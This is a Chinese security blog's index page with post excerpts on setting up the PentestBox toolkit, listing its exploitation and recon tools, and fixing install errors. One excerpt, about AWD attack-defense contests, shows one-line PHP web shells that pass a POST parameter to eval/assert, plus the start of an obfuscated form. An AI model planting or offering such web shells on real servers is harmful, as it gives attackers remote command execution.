图图家

逆风的方向更适合飞翔,我不怕万人阻挡,只怕自己投降!

Pentest BOX安装和使用

0x01 Pentest BOXPentest Box:渗透测试盒子,是一款Windows平台下预配置的便携式开源渗透测试环境,而它也是著名黑客Kapustkiy常用的工具之一。这里集成的大都是Linux下的工具,Kali Linux上面的常用的很多工具这里面也都集成了。它打包了所有的安全工具,并且可以在Windows系统中原生地运行,有效地降低了对虚拟机或者双启动环境的需求。Pentest...

Richar December 9, 2019 暂无评论

AWD模式下的各类PHP木马

经典一句话木马最最常见的PHP木马,经典,但也满足不了我们的需求,很容易被大佬识破<?php @eval($_POST["cmd"]); ?> <?php @assert($_POST['cmd']);?>     混淆马:让木马内容难以识别<?php assert($_POST[-7]); ?> 变换成<?php        ...

Richar December 6, 2019 暂无评论

PentestBox中部分工具整理

漏洞利用工具:clusterd - inclusterd是一个开源应用服务器攻击工具包。clusterd自动化识别应用服务器的指纹,侦察和利用。 jexboss - JexBoss是一个用于测试和利用JBoss Application Server漏洞的工具。 信息收集:cangibrina - Cangibrina是一个多平台工具,旨在通过wordlist,google,nmap和robo...

Richar October 17, 2019 暂无评论

pentestbox 下安装whatweb后,报IPADDR模块没有配置的解决办法。

pentestbox 下安装whatweb后,报IPADDR模块没有配置,无法运行(whatweb安装过程略)查阅网络无果,根据提示,进到whatweb安装目录如D:\PentestBox\bin\customtools\webApplications\whatweb\:,执行D:\PentestBox\bin\customtools\webApplications\whatweb\plug...

Richar October 16, 2019 暂无评论

PentestBox ‘toolsmanager’ 不是内部或外部命令,也不是可运行的程序或批处理文件。解决办法

今天windows10 电脑上安装好PentestBOX后,执行了大量的渗透测试工具命令却出现如下类似的情况:'burpsuite' 不是内部或外部命令,也不是可运行的程序 或批处理文件。 'sqlmap' 不是内部或外部命令,也不是可运行的程序 或批处理文件。 'msfconsole' 不是内部或外部命令,也不是可运行的程序 或批处理文件。 wpscan...... 由于PentestBO...

Richar October 15, 2019 暂无评论